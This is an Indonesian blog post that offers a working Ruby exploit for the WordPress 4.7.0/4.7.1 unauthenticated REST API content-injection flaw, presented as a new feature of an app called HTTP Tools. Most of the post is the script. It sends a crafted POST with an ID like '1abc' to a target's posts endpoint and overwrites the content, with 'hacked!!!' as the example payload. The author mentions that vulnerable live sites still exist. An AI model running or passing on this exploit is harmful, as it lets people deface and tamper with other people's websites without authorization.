16 Februari 2017 - 02:42:27 - Read: 225

Kumpulan Exploits di HTTP Tools Versi 2.8.0 - WP 4.7.0/1 Unauthenticated REST API & Source Code Ruby

WARNING!!! Gunakan tools ini untuk pentesting website anda sendiri.

Yarp, ini bukan tentang vulnerability nya Wordpress tentang Unauthenticated REST API yang udah mulai dingin. Tapi tentang fitur baru HTTP Tools. Kumpulan exploits yang nanti bakalan ada lagi :p

Untuk exploit yang satu ini emang baru sempet ngoding, karena dua dan lain hal. Dan untungnya setelah 2 minggu bugs ini di release, masih ada juga website yang bisa dijadikan bahan oprekan. :p

 Kebetulan karena di server modul-modulnya dah pada ruby, jadi kita bikin exploitnya juga pake ruby

#USAGE 
#GET ruby exploit.rb URL
#POST ruby exploit.rb URL ARTICLE_ID JSON_CONTENT
#EXAMPLE ruby exploit.rb http://target-wp.com 1 "hacked!!!"
#OPTIONAL ganti saja pada req.body dengan title dll untuk melakukan updating field lainnya. 
#COMMENT di tools ini, sengaja hanya bisa mengganti isi kontennya saja. Karena tujuannya bukan buat hackingnya, tapi testing vulnerability nya
#REGARDS @jmozac - http://cafelinux.info

require 'net/http'
require 'uri'
require 'json'

base_api='/wp-json/wp/v2/posts'
target=ARGV[0]+base_api

if ARGV[1] != nil
	id = ARGV[1] + "abc"
	target = target +"/"+ARGV[1]
	
	uri = URI(target)
	req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
	req.body = {id: id, content: URI.decode(ARGV[2])}.to_json
	res = Net::HTTP.start(uri.hostname, uri.port) do |http|
	  http.request(req)
	end

elsif
	request=Net::HTTP.get(URI.parse(target))
	puts request
end

 Kalo penasaran sama hasilnya, langsung ja cobain langsung dari aplikasi HTTP Tools.

Download HTTP Tools versi 2.8.0

Yarp, happy pentesting ^_^